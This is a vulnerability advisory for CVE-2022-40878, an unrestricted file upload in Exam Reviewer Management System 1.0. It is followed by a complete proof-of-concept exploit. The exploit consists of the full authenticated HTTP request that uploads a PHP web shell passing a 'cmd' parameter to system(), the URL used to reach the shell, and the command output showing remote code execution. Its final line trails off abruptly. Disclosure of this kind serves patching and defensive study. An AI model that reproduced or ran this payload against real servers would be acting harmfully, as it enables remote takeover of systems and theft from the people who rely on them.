CVE-2022-40878
a vulnerability classified as critical was found in exam reviewer management system 1.0 (Feedback Software). This vulnerability affects some unknown functionality of the component Profile Page. The manipulation with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434. The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product’s environment. As an impact it is known to affect confidentiality, integrity, and availability.
exploit
# Exploit Title: Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-02-08
# Exploit Author: Juli Agarwal(@agarwaljuli)
# Vendor Homepage:
https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html
# Software Link:
https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code
# Version: 1.0
# Tested on: XAMPP, Kali Linux
Description – The application suffers from a remote code execution in the
admin panel. An authenticated attacker can upload a web-shell php file in
profile page to achieve remote code execution.
POC:-
==========
# Request:
==========
POST /erms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------37791356766765055891341961306
Content-Length: 1004
Origin: http://localhost
Connection: close
Referer: http://localhost/erms/admin/?page=user
Cookie: PHPSESSID=22f0bd65ef694041af3177057e7fbd5a
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="id"
1
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="firstname"
Adminstrator
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="lastname"
Admin
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="username"
admin
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="password"
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/x-php
<html>
<body>
<b>Remote code execution: </b><br><pre>
<?php if(isset($_REQUEST['cmd'])){ echo
"<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
</pre>
</body>
</html>
-----------------------------37791356766765055891341961306—
================
# Webshell access:
================
# Webshell access via:
POC: http://localhost/erms/uploads/1644334740_shell.php?cmd=id
# Webshell response:
Remote code execution:
uid=1(daemon) gid=1(daemon) groups=1(daemon)Exploit requires authentication. The target web app has it disabled